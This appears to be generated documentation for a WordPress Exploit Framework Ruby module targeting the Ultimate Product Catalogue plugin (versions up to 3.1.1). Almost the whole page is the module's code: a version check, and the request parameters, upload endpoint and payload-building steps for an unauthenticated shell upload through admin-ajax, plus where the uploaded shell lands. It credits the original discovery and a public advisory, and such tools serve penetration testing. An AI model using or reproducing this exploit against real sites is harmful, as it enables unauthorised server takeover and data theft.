class Wpxf::Exploit::UltimateProductCatalogueShellUpload
Public Class Methods
new()
click to toggle source
Calls superclass method
Wpxf::WordPress::ShellUpload::new
# File lib/wpxf/modules/exploit/shell/ultimate_product_catalogue_shell_upload.rb, line 6 def initialize super update_info( name: 'Ultimate Product Catalogue <= v3.1.1 Unauthenticated Shell Upload', author: [ 'LUCA ERCOLI ', # Discovery and disclosure 'rastating' # WPXF module ], references: [ ['WPVDB', '7939'], ['URL', 'https://blog.seeweb.it/wordpress-ultimate-product-catalogue-vulnerability/'] ], date: 'Apr 22 2015' ) end
Public Instance Methods
check()
click to toggle source
# File lib/wpxf/modules/exploit/shell/ultimate_product_catalogue_shell_upload.rb, line 23 def check check_plugin_version_from_changelog('ultimate-product-catalogue', 'readme.txt', '3.1.2') end
payload_body_builder()
click to toggle source
# File lib/wpxf/modules/exploit/shell/ultimate_product_catalogue_shell_upload.rb, line 31 def payload_body_builder builder = Utility::BodyBuilder.new builder.add_file_from_string('Products_Spreadsheet', payload.encoded, payload_name) builder end
upload_request_params()
click to toggle source
# File lib/wpxf/modules/exploit/shell/ultimate_product_catalogue_shell_upload.rb, line 37 def upload_request_params { 'action' => 'widgets_init', 'Action' => 'UPCP_AddProductSpreadsheet' } end
uploaded_payload_location()
click to toggle source
# File lib/wpxf/modules/exploit/shell/ultimate_product_catalogue_shell_upload.rb, line 44 def uploaded_payload_location normalize_uri(wordpress_url_plugins, 'ultimate-product-catalogue', 'product-sheets', payload_name) end
uploader_url()
click to toggle source
# File lib/wpxf/modules/exploit/shell/ultimate_product_catalogue_shell_upload.rb, line 27 def uploader_url wordpress_url_admin_ajax end